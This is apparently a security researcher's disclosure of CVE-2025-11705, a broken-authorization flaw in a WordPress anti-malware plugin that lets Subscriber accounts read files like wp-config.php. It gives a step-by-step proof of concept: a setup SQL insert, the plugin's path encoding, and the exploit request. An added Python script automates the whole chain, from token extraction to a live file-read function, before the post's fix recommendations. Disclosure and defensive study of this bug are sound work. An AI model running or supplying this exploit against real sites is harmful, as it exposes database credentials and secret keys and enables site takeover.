The Anti-Malware Security and Brute-Force Firewall plugin is installed on over 100,000 WordPress sites to detect, quarantine, and remove malicious code, as well as to prevent brute-force login attempts. Central to its functionality is a quarantine system that logs suspicious files into a private custom post type (GOTMLS_quarantine) and exposes administrative AJAX endpoints for viewing, scanning, and clearing these quarantined items. However, CVE-2025-11705 reveals a severe broken authorization chain: through the public-facing GOTMLS_View_Quarantine endpoint, any authenticated user – including a Subscriber+ – can obtain a valid GOTMLS_mt token, then reuse that token to invoke GOTMLS_scan and read arbitrary filesystem files (e.g., wp-config.php), or call GOTMLS_empty_trash to tamper with quarantine records. This combination of token leakage and missing capability checks constitutes a critical confidentiality and integrity risk.
| Field | Value |
| --- | --- |
| CVE | CVE-2025-11705 |
| Plugin Version | Anti-Malware Security and Brute-Force Firewall <= 4.23.81 |
| Severity | High |
| All-time downloads | 7 283 946 |
| Active installations | 100 000+ |
| Publicly Published | October 28, 2025 |
| Last Updated | October 28, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11705 ; https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gotmls/anti-malware-security-and-brute-force-firewall-42381-missing-authorization-to-authenticated-subscriber-arbitrary-file-read |
Timeline
| Date | Event |
| --- | --- |
| August 3, 2025 | Plugin testing and vulnerability detection in Anti-Malware Security and Brute-Force Firewall completed |
| August 3, 2025 | I contacted the plugin author and provided a vulnerability PoC with a description and recommendations for fixing |
| October 28, 2025 | CVE-2025-11705 registered |
Discovery of the Vulnerability
During security testing, researchers observed that the AJAX action GOTMLS_View_Quarantine (registered without a nonce or capability check) renders a quarantined-item list for any logged-in user. In each table row, the plugin embeds an HTML anchor linking to the GOTMLS_scan endpoint, including the freshly minted GOTMLS_mt token for that user. Because both GOTMLS_scan and GOTMLS_empty_trash accept this token—validated only by the bare GOTMLS_get_nonce() function—and do not enforce current_user_can() or check nonces, a Subscriber+ user can extract the token from the quarantine list and invoke scan or empty commands at will. Code references:
- Token generation: anchors in gotmls/images/index.php include action=GOTMLS_scan&GOTMLS_mt={token}.
- View quarantine: gotmls/index.php, lines ~420-433 (no authorization check).
- Empty trash: lines ~1615-1623 (GOTMLS_ajax_empty_trash checks only GOTMLS_get_nonce()).
- Scan: lines ~1785-1863 (GOTMLS_ajax_scan decodes the path and calls file_get_contents()).
Understanding Arbitrary File Read Attacks
WordPress security best practices require that any AJAX endpoint performing sensitive operations must implement both nonce verification and capability checks to prevent Cross-Site Request Forgery (CSRF) and enforce role-based access. In prior CVEs—such as CVE-2025-9202 in the ColorMag theme—plugins exposed nonces to low-privilege users and omitted current_user_can(), enabling unauthorized demo imports. Likewise, CVE-2025-8595 in the Zakra theme allowed Subscriber+ users to install demos. CVE-2025-11705 extends this pattern: by leaking a valid token through an unauthenticated view endpoint and then accepting it in critical handlers without verifying the user’s role, the plugin effectively grants Subscriber+ users the ability to read arbitrary server-side files and erase quarantine records, thus breaking confidentiality and integrity.
Exploiting the Arbitrary File Read Vulnerability
To exploit CVE-2025-11705, an attacker holding a Subscriber+ session cookie proceeds as follows.
POC:
1. Make sure at least one quarantine record exists, so that GOTMLS_View_Quarantine renders links. If your test environment has none, you can simulate one with a single SQL insert into wp_posts using the structure the plugin expects (post_type = 'GOTMLS_quarantine', post_status = 'private'). A minimal placeholder, as one statement:

   ```sql
   INSERT INTO wp_posts (post_author, post_date, post_date_gmt, post_content, post_title, post_excerpt, post_status, comment_status, ping_status, post_password, post_name, to_ping, pinged, post_modified, post_modified_gmt, post_content_filtered, post_parent, guid, menu_order, post_type, post_mime_type, comment_count)
   VALUES (1, NOW(), UTC_TIMESTAMP(), '', '/tmp/GOTMLS_POC_missing.txt', '', 'private', 'closed', 'closed', '', 'gotmls-quarantine-poc', '', '', NOW(), UTC_TIMESTAMP(), '', 0, 'GOTMLS-POC', 0, 'GOTMLS_quarantine', '00000000000000000000000000000000', 0);
   ```

   This mirrors how the plugin queries quarantined items.
2. Log in as a low-privileged user such as a Subscriber and open https://your-site/wp-admin/admin-ajax.php?action=GOTMLS_View_Quarantine. The response contains at least one <a> element whose href points to admin-ajax.php?action=GOTMLS_scan and already carries a GOTMLS_mt=<hex> token. Copy that token value verbatim; it is a user-bound token valid for your session. Because the server checks only GOTMLS_get_nonce() with an empty context and never calls current_user_can(...), the token is accepted by GOTMLS_scan and GOTMLS_empty_trash regardless of your role.
3. Craft a request that reads an arbitrary file. The GOTMLS_scan parameter expects the plugin's custom base64-like encoding of the path: base64-encode the absolute path, strip the trailing = padding, replace + with - and / with _, then append a single digit equal to the number of = characters stripped plus one (so two = become 3). For the stock Debian/Apache path /var/www/html/wordpress/wp-config.php the encoded value is L3Zhci93d3cvaHRtbC93b3JkcHJlc3Mvd3AtY29uZmlnLnBocA3.
4. With the token from step 2, request:
   GET /wordpress/wp-admin/admin-ajax.php?action=GOTMLS_scan&GOTMLS_mt=<TOKEN_FROM_VIEW_QUARANTINE>&GOTMLS_scan=L3Zhci93d3cvaHRtbC93b3JkcHJlc3Mvd3AtY29uZmlnLnBocA3
   The returned iframe HTML contains the contents of wp-config.php.
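The authorization chain described under Discovery and the four PoC steps above, written out as an added example that is not part of the original post and not the plugin's own code. It implements the GOTMLS_scan path encoding exactly as the write-up describes it (with a decoder for checking what an existing link targets), extracts the leaked GOTMLS_mt token from a quarantine listing, and assembles the scan request. The function names, the constructed sample HTML and the token value in it are assumptions for the example; the live helper assumes a requests.Session already logged in as a Subscriber and is not executed offline.

```python
"""Added example for CVE-2025-11705 (not the plugin's code, not the original PoC
script): the exploitation chain as reusable, offline-checkable functions.
Names, the sample HTML and the token inside it are constructed for the example."""
import base64
import re
from typing import Optional
from urllib.parse import urlencode

# Hypothetical target and file; change these for your own test instance.
TARGET = "https://your-site/wordpress"
WP_CONFIG = "/var/www/html/wordpress/wp-config.php"


def gotmls_encode(path: str) -> str:
    """Encode a filesystem path the way the GOTMLS_scan parameter expects, per the
    scheme described in the write-up: base64, '=' padding stripped, '+'->'-',
    '/'->'_', then one digit equal to (number of '=' stripped) + 1."""
    raw = base64.b64encode(path.encode()).decode()
    body = raw.rstrip("=")
    pad = len(raw) - len(body)  # 0, 1 or 2 '=' characters were stripped
    return body.replace("+", "-").replace("/", "_") + str(pad + 1)


def gotmls_decode(value: str) -> str:
    """Inverse of gotmls_encode; shows which file an existing scan link targets."""
    body, digit = value[:-1], int(value[-1])
    body = body.replace("-", "+").replace("_", "/")
    return base64.b64decode(body + "=" * (digit - 1)).decode()


# Constructed stand-in for the HTML GOTMLS_View_Quarantine returns to a logged-in
# user: one row whose scan link already carries the GOTMLS_mt token. The token is
# made up; the GOTMLS_scan value is gotmls_encode("/tmp/GOTMLS_POC_missing.txt").
SAMPLE_VIEW_HTML = (
    "<table><tr><td>/tmp/GOTMLS_POC_missing.txt</td><td>"
    '<a href="admin-ajax.php?action=GOTMLS_scan&amp;GOTMLS_mt=0123456789abcdef0123456789abcdef'
    '&amp;GOTMLS_scan=L3RtcC9HT1RNTFNfUE9DX21pc3NpbmcudHh01">View</a></td></tr></table>'
)

# The listing is HTML, so '&' may be written '&amp;'; the token is described as hex.
TOKEN_RE = re.compile(r"action=GOTMLS_scan&(?:amp;)?GOTMLS_mt=([0-9A-Fa-f]+)")


def extract_token(html: str) -> Optional[str]:
    """Pull the leaked GOTMLS_mt token out of the quarantine listing, or None when
    no link was rendered (e.g. no quarantine records exist yet)."""
    m = TOKEN_RE.search(html)
    return m.group(1) if m else None


def build_scan_url(base: str, token: str, path: str) -> str:
    """Assemble the GOTMLS_scan request that reads `path` using the leaked token."""
    query = urlencode({"action": "GOTMLS_scan", "GOTMLS_mt": token,
                       "GOTMLS_scan": gotmls_encode(path)})
    return f"{base}/wp-admin/admin-ajax.php?{query}"


def run_live(session, base: str, path: str) -> str:
    """Live chain against a test instance. `session` is a requests.Session that
    already holds a Subscriber's login cookies; returns the body of the scan
    response (the iframe HTML that embeds the file contents)."""
    listing = session.get(f"{base}/wp-admin/admin-ajax.php",
                          params={"action": "GOTMLS_View_Quarantine"}).text
    token = extract_token(listing)
    if token is None:
        raise RuntimeError("no GOTMLS_mt token in listing; add a quarantine record first")
    return session.get(build_scan_url(base, token, path)).text


if __name__ == "__main__":
    print(gotmls_encode(WP_CONFIG))  # L3Zhci93d3cvaHRtbC93b3JkcHJlc3Mvd3AtY29uZmlnLnBocA3
    token = extract_token(SAMPLE_VIEW_HTML)
    print(gotmls_decode("L3RtcC9HT1RNTFNfUE9DX21pc3NpbmcudHh01"))  # /tmp/GOTMLS_POC_missing.txt
    print(build_scan_url(TARGET, token, WP_CONFIG))
```

The encoder is the part worth checking before touching a live site: if your encoded value for wp-config.php does not match the one given in step 3, the scan handler will decode a different path and return nothing useful. The decoder is also a quick way to audit which files the links in a real listing point at.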
The ability to read wp-config.php or other sensitive files exposes database credentials, secret keys, and API tokens, enabling full site takeover via out-of-band database access or remote code execution. On multi-author or membership sites, any subscriber could quietly exfiltrate secrets. Deleting quarantine logs also removes forensic evidence of malware detection, allowing attackers to persist undetected. In enterprise or eCommerce environments, such a breach can lead to data theft, financial fraud, and regulatory non-compliance, compounding legal and reputational damages.
Recommendations for Improved Security
- Enforce capability checks: wrap GOTMLS_ajax_scan, GOTMLS_ajax_empty_trash, and GOTMLS_View_Quarantine in current_user_can('manage_options') so that only administrators can reach them.
- Strengthen nonce handling: use check_ajax_referer() with a distinct nonce for each action, and never expose tokens through public view endpoints.
- Separate view and action tokens: generate action-specific nonces per user session and ensure they cannot be reused across contexts.
- Audit AJAX routes: review all add_action('wp_ajax_*') handlers in the plugin, applying both nonce and capability checks.
- Log and alert: record each scan and empty-trash event with user ID and timestamp, and send immediate alerts for unauthorized attempts.
By taking proactive measures to address Arbitrary File Read vulnerabilities like CVE-2025-11705, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #ArbitraryFileRead/LFI #WebsiteSafety #StayProtected #HighVulnerability
Dmitrii I.